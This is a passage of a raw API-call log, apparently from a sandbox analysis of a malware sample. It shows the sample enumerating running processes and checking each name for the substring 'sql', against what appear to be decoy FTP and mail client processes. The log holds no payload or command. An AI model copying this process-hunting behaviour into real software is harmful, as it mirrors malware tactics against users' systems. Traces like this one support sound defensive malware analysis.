LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596848 [0126.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3596848, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0126.286] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0126.286] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="sql") returned 0x0 [0126.286] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0126.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0126.287] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35969a8 [0126.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x35969a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0126.288] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0126.288] StrStrIA (lpFirst="registered try.exe", lpSrch="sql") returned 0x0 [0126.288] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0126.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0126.289] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x35857d8 [0126.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x35857d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0126.289] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0126.289] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="sql") returned 0x0 [0126.289] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0126.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0126.290] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3582eb8 [0126.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3582eb8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0126.290] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0126.290] StrStrIA (lpFirst="invite.exe", lpSrch="sql") returned 0x0 [0126.290] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0126.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0126.291] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3582e58 [0126.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3582e58, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0126.291] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0126.291] StrStrIA (lpFirst="idol.exe", lpSrch="sql") returned 0x0 [0126.292] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0126.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0126.293] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3585918 [0126.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3585918, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0126.293] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0126.293] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="sql") returned 0x0 [0126.293] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0126.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0126.294] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3585940 [0126.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3585940, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0126.294] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0126.294] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="sql") returned 0x0 [0126.294] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0126.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0126.295] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3582db0 [0126.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3582db0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0126.295] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0126.295] StrStrIA (lpFirst="powell_jane.exe", lpSrch="sql") returned 0x0 [0126.296] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0126.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0126.297] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596a68 [0126.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3596a68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0126.297] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0126.297] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="sql") returned 0x0 [0126.297] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0127.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0127.171] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3582ea0 [0127.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3582ea0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0127.171] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0127.172] StrStrIA (lpFirst="gainedshape.exe", lpSrch="sql") returned 0x0 [0127.172] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0127.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0127.174] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596808 [0127.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3596808, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0127.174] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0127.174] StrStrIA (lpFirst="opens-versions.exe", lpSrch="sql") returned 0x0 [0127.175] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0127.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0127.176] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3585b48 [0127.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3585b48, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0127.176] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0127.177] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="sql") returned 0x0 [0127.177] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0127.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0127.178] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582d20 [0127.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582d20, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0127.180] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0127.180] StrStrIA (lpFirst="3dftp.exe", lpSrch="sql") returned 0x0 [0127.180] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0127.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0127.183] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35967a8 [0127.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x35967a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0127.183] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0127.183] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="sql") returned 0x0 [0127.183] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0127.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0127.187] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582d38 [0127.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582d38, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0127.187] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0127.187] StrStrIA (lpFirst="alftp.exe", lpSrch="sql") returned 0x0 [0127.187] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0127.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0127.189] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582ed0 [0127.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3582ed0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0127.238] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0127.238] StrStrIA (lpFirst="barca.exe", lpSrch="sql") returned 0x0 [0127.238] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0127.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0127.240] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582ee8 [0127.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3582ee8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0127.240] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0127.240] StrStrIA (lpFirst="bitkinex.exe", lpSrch="sql") returned 0x0 [0127.240] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0127.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0127.242] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582f90 [0127.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582f90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0127.242] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0127.243] StrStrIA (lpFirst="coreftp.exe", lpSrch="sql") returned 0x0 [0127.243] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0127.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0127.245] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e438 [0127.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e438, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0127.245] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0127.245] StrStrIA (lpFirst="far.exe", lpSrch="sql") returned 0x0 [0127.245] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0127.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0127.246] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3582f48 [0127.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3582f48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0127.247] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0127.247] StrStrIA (lpFirst="filezilla.exe", lpSrch="sql") returned 0x0 [0127.247] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0127.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0127.248] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582d50 [0127.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3582d50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0127.249] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0127.249] StrStrIA (lpFirst="flashfxp.exe", lpSrch="sql") returned 0x0 [0127.249] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0127.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0127.250] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582f00 [0127.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3582f00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0127.250] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0127.250] StrStrIA (lpFirst="fling.exe", lpSrch="sql") returned 0x0 [0127.250] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0127.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0127.252] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35967c8 [0127.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x35967c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0127.252] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0127.252] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="sql") returned 0x0 [0127.252] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0127.254] WideCharToMultiByte (in: 